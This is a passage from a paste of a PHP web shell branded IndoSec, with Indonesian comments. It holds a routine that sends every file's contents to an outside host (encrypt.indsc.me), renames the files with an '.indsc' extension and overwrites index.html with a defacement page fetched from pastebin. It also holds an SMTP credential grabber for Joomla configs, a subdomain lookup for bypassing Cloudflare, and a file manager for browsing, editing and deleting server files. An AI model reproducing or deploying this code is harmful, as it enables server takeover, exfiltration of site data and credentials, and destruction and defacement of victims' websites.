  1454. function listFolderFiles($dir){
  1455. if (is_dir($dir)) {
  1456. $ffs = scandir($dir);
  1457. unset($ffs[array_search('.', $ffs, true)]);
  1458. unset($ffs[array_search('..', $ffs, true)]);
  1459. if (count($ffs) < 1)
  1460. return;
  1461. foreach($ffs as $ff){
  1462. $files = $dir."/".$ff;
  1463. if(!is_dir($files)){
  1464. /* encrypt file */
  1465. $file = file_get_contents($files);
  1466. $_a = base64_encode($file);
  1467. /* proses curl */
  1468. $ch = curl_init();
  1469. curl_setopt($ch, CURLOPT_URL, 'http://encrypt.indsc.me/api.php?type=encrypt');
  1470. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1471. curl_setopt($ch, CURLOPT_POSTFIELDS, "text=$_a");
  1472. $x = json_decode(curl_exec($ch));
  1473. if($x->status == 'success'){
  1474. $_enc = base64_decode($x->data);
  1475. rename($files, $files. ".indsc");
  1476. echo "\n[+] $files => Success Encrypted";
  1477. }
  1478. }
  1479. if(is_dir($dir.'/'.$ff)) listFolderFiles($dir.'/'.$ff);
  1480. }
  1481. $index = file_get_contents('https://pastebin.com/raw/aGZ6BeTH');
  1482. $_o = fopen($dir."/index.html", "w");
  1483. fwrite($_o, $index);
  1484. fclose($_o);
  1485. echo "[+] Done !<br/>";
  1486. }else{
  1487. echo "bukan dir<br/>";
  1488. }
  1489. }
  1490. listFolderFiles($dir);
  1491. }
  1492. }
  1493.  
  1494.  
  1495.  
  1496. if ($_GET['aksi'] == 'smtpgrab') {
  1497. function scj($path) {
  1498. $paths = scandir($path);
  1499. foreach($paths as $pathb) {
  1500. if(!is_file("$path/$pathb")) continue;
  1501. $ambil = file_get_contents("$path/$pathb");
  1502. $ambil = str_replace("$", "", $ambil);
  1503. if(preg_match("/JConfig|joomla/", $ambil)) {
  1504. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1505. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1506. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1507. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1508. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1509. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1510. echo "<p class='text-muted'>NB : Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/namafolder_config )</p>
  1511. <table class='text-white table table-bordered'>
  1512. <tr>
  1513. <td>SMTP Host: $smtp_host</td>
  1514. </tr>
  1515. <tr>
  1516. <td>SMTP Port: $smtp_port</td>
  1517. </tr>
  1518. <tr>
  1519. <td>SMTP User: $smtp_user</td>
  1520. </tr>
  1521. <tr>
  1522. <td>SMTP Pass: $smtp_pass</td>
  1523. </tr>
  1524. <tr>
  1525. <td>SMTP Auth: $smtp_auth</td>
  1526. </tr>
  1527. <tr>
  1528. <td>SMTP Secure: $smtp_secure</td>
  1529. </tr>
  1530. </table>";
  1531. }
  1532. }
  1533. }
  1534. $smtp = scj($path);
  1535. exit;
  1536. }
  1537.  
  1538. if ($_GET['aksi'] == 'bypascf') {
  1539. echo '<form method="POST"><br>
  1540. <div class="form-group input-group">
  1541. <select class="form-control" name="idsPilih">
  1542. <option>Pilih Metode</option>
  1543. <option>ftp</option>
  1544. <option>direct-conntect</option>
  1545. <option>Webmail</option>
  1546. <option>Cpanel</option>
  1547. </select>
  1548. </div>
  1549. <div class="form-group input-group">
  1550. <input class="form-control" type="text" name="target" placeholder="Masukan Url">
  1551. <input class="btn btn-danger form-control" type="submit" value="Bypass">
  1552. </div><br>
  1553. </form>';
  1554.  
  1555. $target = $_POST['target'];
  1556.  
  1557. # Bypass From FTP
  1558. if($_POST['idsPilih'] == "ftp") {
  1559. $ftp = gethostbyname("ftp."."$target");
  1560. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  1561. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
  1562. }
  1563.  
  1564. # Bypass From Direct-Connect
  1565. if($_POST['idsPilih'] == "direct-conntect") {
  1566. $direct = gethostbyname("direct-connect."."$target");
  1567. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  1568. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
  1569. }
  1570.  
  1571. # Bypass From Webmail
  1572. if($_POST['idsPilih'] == "webmail") {
  1573. $web = gethostbyname("webmail."."$target");
  1574. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  1575. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
  1576. }
  1577.  
  1578. # Bypass From Cpanel
  1579. if($_POST['idsPilih'] == "cpanel") {
  1580. $cpanel = gethostbyname("cpanel."."$target");
  1581. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
  1582. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
  1583. }
  1584. exit;
  1585. }
  1586.  
  1587. if(isset($_GET['path'])){
  1588. $path = $_GET['path'];
  1589. chdir($path);
  1590. }else{
  1591. $path = getcwd();
  1592. }
  1593. $path = str_replace('\\','/',$path);
  1594. $paths = explode('/',$path);
  1595. echo "<br/>Path : ";
  1596. foreach($paths as $id=>$pat){
  1597. if($pat == '' && $id == 0){
  1598. $a = true;
  1599. echo '<a href="?dir=/">/</a>';
  1600. continue;
  1601. }
  1602. if($pat == '') continue;
  1603. echo '<a href="?dir=';
  1604. for($i=0;$i<=$id;$i++){
  1605. echo "$paths[$i]";
  1606. if($i != $id) echo "/";
  1607. }
  1608. echo '">'.$pat.'</a>/';
  1609. }
  1610. $scandir = scandir($path);
  1611. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  1612. echo '<center><div id="tab"><table class="text-white mt-1 table-hover table-responsive">
  1613. <thead class="bg-info">
  1614. <th style="width:45%">File/Folder</th>
  1615. <th>Size</th>
  1616. <th>Permission</th>
  1617. <th>Action</th>
  1618. </thead>';
  1619.  
  1620. foreach($scandir as $dir){
  1621.  
  1622. /* cek jika ini berbentuk folder */
  1623. /* cek jika nama folder karaker terlalu panjang */
  1624. if (strlen($dir) > 25) {
  1625. $_dir = substr($dir, 0, 25)."...";
  1626. }else{
  1627. $_dir = $dir;
  1628. }
  1629. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  1630. echo
  1631. '<tr>
  1632. <td class="text-white"><img src="http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png" class="ico"></img> <a href="?dir='.$path.'/'.$dir.'">'.$_dir.'</a></td>
  1633. <td class="text-white"><center>--</center></td>
  1634. <td class="text-white"><center>';
  1635. if(is_writable($path.'/'.$dir)) echo '<font color="#00ff00">';
  1636. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  1637. echo perms($path.'/'.$dir);
  1638. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font></center></td>
  1639. <td><center><a title="Rename" class="badge badge-success" href="?dir='.$path.'/'.$dir.'&aksi=rename_folder">&nbsp;<i class="fas fa-pen"></i>&nbsp;</a>&nbsp;&nbsp;<a title="Delete" class="badge badge-danger" href="?dir='.$path.'/'.$dir.'&aksi=hapus_folder">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>
  1640. </td>
  1641. ';
  1642. }
  1643.  
  1644. foreach($scandir as $file){
  1645.  
  1646. /* cek jika ini berbentuk file */
  1647. if(!is_file($path.'/'.$file)) continue;
  1648. $size = filesize($path.'/'.$file)/1024;
  1649. $size = round($size,3);
  1650.  
  1651. if($size >= 1024){
  1652. $size = round($size/1024,2).' MB';
  1653. }else{
  1654. $size = $size.' KB';
  1655. }
  1656.  
  1657.  
  1658. echo '<tr>
  1659. <td><img src="';
  1660.  
  1661. /* set image berdasarkan extensi file */
  1662. $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
  1663. if($ext == "php") {
  1664. echo 'https://image.flaticon.com/icons/png/128/337/337947.png"';
  1665. }elseif ($ext == "html") {
  1666. echo 'https://image.flaticon.com/icons/png/128/136/136528.png"';
  1667. }elseif ($ext == "css") {
  1668. echo 'https://image.flaticon.com/icons/png/128/136/136527.png"';
  1669. }elseif ($ext == "png") {
  1670. echo 'https://image.flaticon.com/icons/png/128/136/136523.png"';
  1671. }elseif ($ext == "jpg") {
  1672. echo 'https://image.flaticon.com/icons/png/128/136/136524.png"';
  1673. }elseif ($ext == "jpeg") {
  1674. echo 'http://i.imgur.com/e8mkvPf.png"';
  1675. }elseif($ext == "zip") {
  1676. echo 'https://image.flaticon.com/icons/png/128/136/136544.png"';
  1677. }elseif ($ext == "js") {
  1678. echo 'https://image.flaticon.com/icons/png/128/1126/1126856.png';
  1679. }elseif ($ext == "ttf") {
  1680. echo 'https://image.flaticon.com/icons/png/128/1126/1126892.png';
  1681. }elseif ($ext == "otf") {
  1682. echo 'https://image.flaticon.com/icons/png/128/1126/1126891.png';
  1683. }elseif ($ext == "txt") {
  1684. echo 'https://image.flaticon.com/icons/png/128/136/136538.png';
  1685. }elseif ($ext == "ico") {
  1686. echo 'https://image.flaticon.com/icons/png/128/1126/1126873.png';
  1687. }elseif ($ext == "conf") {
  1688. echo 'https://image.flaticon.com/icons/png/512/1573/1573301.png';
  1689. }elseif ($ext == "htaccess") {
  1690. echo 'https://image.flaticon.com/icons/png/128/1720/1720444.png';
  1691. }elseif ($ext == "sh") {
  1692. echo 'https://image.flaticon.com/icons/png/128/617/617535.png';
  1693. }elseif ($ext == "py") {
  1694. echo 'https://image.flaticon.com/icons/png/128/180/180867.png';
  1695. }elseif ($ext == "indsc") {
  1696. echo 'https://image.flaticon.com/icons/png/512/1265/1265511.png';
  1697. }elseif ($ext == "sql") {
  1698. echo 'https://img.icons8.com/ultraviolet/2x/data-configuration.png';
  1699. }elseif ($ext == "pl") {
  1700. echo 'http://i.imgur.com/PnmX8H9.png';
  1701. }elseif ($ext == "pdf") {
  1702. echo 'https://image.flaticon.com/icons/png/128/136/136522.png';
  1703. }elseif ($ext == "mp4") {
  1704. echo 'https://image.flaticon.com/icons/png/128/136/136545.png';
  1705. }elseif ($ext == "mp3") {
  1706. echo 'https://image.flaticon.com/icons/png/128/136/136548.png';
  1707. }elseif ($ext == "git") {
  1708. echo 'https://image.flaticon.com/icons/png/128/617/617509.png';
  1709. }elseif ($ext == "md") {
  1710. echo 'https://image.flaticon.com/icons/png/128/617/617520.png';
  1711. }else{
  1712. echo 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
  1713. }
  1714. echo '" class="ico2"></img>';
  1715.  
  1716. /* cek jika karaker terlalu panjang */
  1717. if (strlen($file) > 25) {
  1718. $_file = substr($file, 0, 25)."...-.".$ext;
  1719. }else{
  1720. $_file = $file;
  1721. }
  1722.  
  1723. echo' <a href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">'.$_file.'</a></td>
  1724. <td><center>'.$size.'</center></td>
  1725. <td><center>';
  1726. if(is_writable($path.'/'.$file)) echo '<font color="#00ff00">';
  1727. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  1728. echo perms($path.'/'.$file);
  1729. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>
  1730. <td class="text-center"><a title="Lihat" class="badge badge-info" href="?dir='.$path.'&aksi=view&dirf='.$path.'/'.$file.'">&nbsp;<i class="fa fa-eye"></i>&nbsp;</a>&nbsp;&nbsp;<a title="Edit" class="badge badge-success" href="?dir='.$path.'&aksi=edit&dirf='.$path.'/'.$file.'">&nbsp;<i class="fas fa-pen"></i>&nbsp;</a>&nbsp;&nbsp;<a class="badge badge-danger" href="?dir='.$path.'&aksi=hapusf&dirf='.$path.'/'.$file.'" title="Delete">&nbsp;<i class="fa fa-trash"></i>&nbsp;</a>
  1731. </td>
  1732. </tr>';
  1733. }
  1734. echo '</table></div><hr/><p style="opacity: 0.3;"><a href="https://facebook.com/IndoSecOfficial" style="color: white;">Copyright 2019 { IndoSec }</a></p></center><br/>';
  1735. echo "<a href='' class='scrollToTop'><i class='fa fa-arrow-up up' aria-hidden='true'></i></a>";
  1736. /*
  1737. End
  1738. */
  1739. ?>
Add Comment
Please, Sign In to add comment